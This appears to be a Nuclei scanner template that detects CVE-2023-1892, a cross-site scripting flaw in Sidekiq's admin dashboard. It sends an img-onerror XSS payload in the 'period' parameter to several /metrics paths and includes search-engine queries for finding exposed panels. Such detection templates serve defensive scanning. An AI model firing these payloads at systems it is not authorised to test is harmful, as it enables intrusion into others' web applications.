id: CVE-2023-1892 info: name: Sidekiq < 7.0.8 - Cross-Site Scripting author: ritikchaddha,princechaddha severity: critical description: | An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system. reference: - https://huntr.com/bounties/e35e5653-c429-4fb8-94a3-cbc123ae4777 - https://github.com/sidekiq/sidekiq/commit/458fdf74176a9881478c48dc5cf0269107b22214 - https://nvd.nist.gov/vuln/detail/CVE-2023-1892 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H cvss-score: 9.6 cve-id: CVE-2023-1892 cwe-id: CWE-79 epss-score: 0.02595 epss-percentile: 0.90273 cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:* metadata: max-request: 4 vendor: contribsys product: sidekiq shodan-query: http.title:"sidekiq" fofa-query: - title="Sidekiq" - title="sidekiq" google-query: intitle:"sidekiq" tags: cve,cve2023,sidekiq,contribsys,xss flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/queues" matchers: - type: word internal: true part: body words: - "Sidekiq" - "Dashboard" condition: and - method: GET path: - "{{BaseURL}}/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E" - "{{BaseURL}}/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E" - "{{BaseURL}}/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E" stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - 'text/html' - type: status status: - 200 # digest: 4a0a0047304502200c2a6ce19ce9eb45cb04276522c9693a728388d417553ced77f30ec12ee9417e0221008dc88eae939ce4665bddcc9538ed6c18aa62054a7a768682d3b491b264114bb9:922c64590222798bb761d5b6d8e72950